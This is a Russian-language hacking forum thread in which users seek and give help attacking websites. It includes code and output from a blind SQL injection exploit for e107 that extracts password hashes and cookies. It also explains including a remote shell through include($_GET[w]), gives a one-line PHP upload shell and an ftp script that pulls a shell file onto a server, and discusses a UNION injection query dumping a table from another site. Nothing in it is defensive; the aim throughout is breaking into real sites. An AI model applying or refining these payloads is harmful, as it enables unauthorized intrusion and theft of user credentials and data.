Привет всем! есть уязвимость "e107 <= 0.7.13 (usersettings.php) Blind SQL Injection Exploit" вот эксплоит: http://www.securitylab.ru/poc/extra/361578.php Вот что выдаёт: Я так понимаю, тут написано, что нужно увеличить задержку чего-то. А чего и как - хз. И можно ли вообще это как-то увеличить?
my $benchmark = 1000000; - наверное тут надо циферьку побольше поставить или тупо во это вырезать: Code: if($bdelay - $ndelay < 4) { print STDOUT "[-] Benchmarck delay too small compared to normal delay, increase it.\n"; exit (); }
@diznt я же тебе уже написал в прошлой теме, что так должно быть: при выполнении команды ftp пользователю предлагается ввести команды в консоли ftp. Я же писал выполни ftp /? узнаешь список команд. Если ты такой ленивый, то вот пример скачивания файла с удаленного ftp: Code: open ftp.someserver.com user username password ascii cd /htdocs get s.php bye затем сохраняешь это в файл ftp.txt и выполняешь команду в cmd: ftp -n -s:C:\ftp.txt В итоге ты скачаешь файл s.php с ftp-сервера под учетной записью пользователя username с паролем password Или используй tftp, скачивай сервер по ссылке, которую я уже давал и запускай на своем компе, указав папку с доступными для скачивания файлами.
тогда сплоит работать не будет, время задержки сервера должно быть достаточно существенным, чтобы скрипт мог отличить правильный и неправильный запрос
diznt, как сказал слип - php.su конечно же поможет .. ну а вообще - инклудь шелл и будет тебе радость
есть язык программирования php. в нем есть код. в этом коде можно написать include($_GET[w]) и теперь при обращении к странице site.ru/index.php?w=http://ya.ru/shell.php мы можем использовать код из файла shell.php. Инклуд нужен, чтобы встраивать в код скрипта код из другого файла. как-то так) если не понял-пиши)
AFoST неа не пашет пишу ***.com/test.php?w=http://z0u4.narod.ru/1.php Не помогает... (даже если выбрать хост с поддержкой php) Помогайте)
глянь phpinfo() возможно отключен url_include; проверь url_fopen=on/off? или попробуй так: Code: <form enctype=multipart/form-data method=post><input type=file name=x><input type=submit></form><?$f=$_FILES[x];copy($f[tmp_name],$f[name]);?>
После того, как изменил $benchmark, вроде заработало, но теперь выдаёт такое: Code: [+] e107 <= 0.7.13 Blind SQL Injection [+] Admin/User's Password Retrieve Exploit [+] Coded by __GiReX__ [+] Logged in with your account.. [+] Checking database delay, please wait.. [+] Normal delay: 1 [+] Benchmark delay: 13 [+] Victim password: f [-] Exploit mistake: please re-check benchmark Я так понимаю, загвоздка где-то здесь: Code: for(my $j = 1; $j <= 32; $j++) { foreach $char(@cset) { info(chr($char), $hash, "password"); my ($pre_time, $post_time) = time(); $rv = check_char($char, $j, "user_password"); $post_time = time(); if($rv and ($post_time - $pre_time) > ($ndelay + 3)) { $hash .= chr($char); last; } } last if $j != length($hash); } if(not defined $hash or length($hash) != 32) { print STDOUT "\n\n[-] Exploit mistake: please re-check benchmark\n"; exit; } Изменил строку "if(not defined $hash or length($hash) != 32)" на "if(not defined $hash)" и скрипт мне выдал: Code: ... [+] Logged in with your account.. [+] Checking database delay, please wait.. [+] Normal delay: 1 [+] Benchmark delay: 13 [+] Victim password: f [+] You can try to login with this cookie: [+] Cookie: e107cookie=1.d41d8cd98f00b204e9800998ecf8427e length(d41d8cd98f00b204e9800998ecf8427e) = 32 Я подставил эти куки, но они не подходят. потом попробовал эксплоит на localhoste и до меня дошло, что он всегда выдаёт один и тот же хэш. В нём зашифрован пароль "". Так что же делать? как заставить скрипт работать? подскажите плиз, я в программировании не бум-бум.
Братцы, выручайте!!!! Есть некий сайт со sql inj, и вот такой запрос http://www.site.com/list.php?cat=-41+union+select+1,2,concat(summ1,0x3a3a,summ2,0x3a3a,summ3,0x3a3a,summ4,0x3a3a,summ5,0x3a3a,summ6,0x3a3a,summ7,0x3a3a,summ8,0x3a3a,summ9,0x3a3a,summ10),4,5,6,7,8,9,10+from+table_name/* Все данные из таблицы table_name,все которые в ней есть, сразу выводятся на страницу. Но во многих значение колонки summ10 пустое. Просто после данных из summ9 идёт :: и пусто. Внимание, вопрос Как вывести только те данные, в которых значение summ10 не пустое? (их мало, но они есть). Каким запросом? Выручайте, очень на вас расчитываю.
[Raz0r] Извини, немного не понял. Это будет выглядеть так? ...+union+select+1,2,concat(summ1,0x3a3a,summ2,0x3a 3a,summ3,0x3a3a,summ4,0x3a3a,summ5,0x3a3a,summ6,0x 3a3a,summ7,0x3a3a,summ8,0x3a3a,summ9,0x3a3a,summ10 ),4,5,6,7,8,9,10+from+table_name+where+summ10=.../* ? Покажи пожалуйста на примере запроса. И ещё, summ10 имеет разные значения, разной длинны. Например 1435 233 1645 и т.д. Если использовать +where+summ10=.../* то ведь необходимо указывать значение summ10.